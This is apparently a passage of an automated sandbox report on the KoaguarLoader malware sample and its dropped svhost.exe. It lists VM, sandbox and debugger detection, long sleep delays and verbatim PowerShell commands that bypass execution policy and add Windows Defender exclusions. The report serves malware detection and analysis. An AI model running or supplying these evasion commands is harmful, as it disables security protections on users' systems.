                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: svhost.exe, 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: KoaguarLoader.exe, 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: SBIEDLL.DLLCKDF3UFINPEMGYXUGBCIQXK5ZLFBIOVAFECIC6SWGI4MFDMTZ4Y7E5GTWVXQ5Q4TF2POC5W3DSXVMUBHIIA4HC387GD3QRXSLFCRHUC074VFAODHHYY2ZZXOSXDPHFEGCPJLQX65C2DRE2ZS0XJQ9ZZDLNGWFPSEGENMNDGHGNCNT0Y5HITFXHE9WPITW6HV9A4RJTDVLX2GCEPTYSWJJMTM1BUHCMCPXJ0X32H7CFOCJMCPHCXGCRMXSH6AYGRDD6WTDMD6AWH3XODZCWTUIF2RAQEBC4HJHUFQKJUBH2ZUOA2EVWCFRTGTG49AWW8ZOEPSZPZAYGHYJZLI75SOCUEXFGBU1PHXJL8ZVM4WOIVOJENYMRQI0KCTITMTHGN3FU6TQZTH6WWQFPLAGEXHS4TKCIFNBYZCQXGEXNRG1B3FJXXDWVWWPYI6MOCV9PCC3AASA0LEUIQWYOMEGKOKUNBCYQBMINFO
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeMemory allocated: 1450000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeMemory allocated: 1B110000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svhost.exeMemory allocated: 7A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\svhost.exeMemory allocated: 1A4B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599765Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599656Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599437Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599328Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599218Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599109Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598999Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598890Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598781Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598671Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598562Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598452Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598343Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598233Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598118Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597999Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597889Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597780Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597671Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597561Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597451Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597341Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597232Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597123Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597013Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 596904Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 596794Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 596685Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 596576Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 596466Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\svhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeWindow / User API: threadDelayed 3405Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeWindow / User API: threadDelayed 6437Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5933Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3820Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7364Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2193Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7974
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1610
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7541
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1994
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -599875s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -599765s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -599656s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -599547s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -599437s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -599328s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -599218s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -599109s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -598999s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -598890s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -598781s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -598671s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -598562s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -598452s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -598343s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -598233s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -598118s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -597999s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -597889s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -597780s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -597671s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -597561s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -597451s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -597341s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -597232s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -597123s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -597013s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -596904s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -596794s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -596685s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -596576s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe TID: 7408Thread sleep time: -596466s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep count: 7974 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep count: 1610 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7932Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6940Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\svhost.exe TID: 8116Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select TotalPhysicalMemory from Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select TotalPhysicalMemory from Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_Processor
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\svhost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599765Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599656Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599437Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599328Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599218Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 599109Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598999Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598890Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598781Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598671Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598562Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598452Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598343Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598233Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 598118Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597999Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597889Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597780Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597671Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597561Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597451Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597341Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597232Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597123Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 597013Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 596904Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 596794Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 596685Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 596576Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeThread delayed: delay time: 596466Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\svhost.exeThread delayed: delay time: 922337203685477
                        Source: svhost.exe, 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: vmware
                        Source: svchost.exe, 0000000F.00000002.2133138102.000001CB6802B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2135882776.000001CB6D859000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: svhost.exe, 00000003.00000002.2146294254.000000001BF11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWver"%SystemRoot%\system32\mswsock.dllnablePasswordReset="true"
                        Source: KoaguarLoader.exe, 00000002.00000002.943836986.0000000001AAE000.00000004.00000020.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.948816607.000000000123E000.00000004.00000020.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1086595215.000000000141E000.00000004.00000020.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2134721083.000000000140E000.00000004.00000020.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217131323.000000000142B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeCode function: 3_2_00007FF936A97871 CheckRemoteDebuggerPresent,3_2_00007FF936A97871
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe'
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svhost.exe'
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svhost.exe'Jump to behavior
                        Bypasses PowerShell execution policy
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe'
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe "C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\svhost.exe "C:\Users\user\AppData\Local\Temp\svhost.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeProcess created: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'Jump to behavior
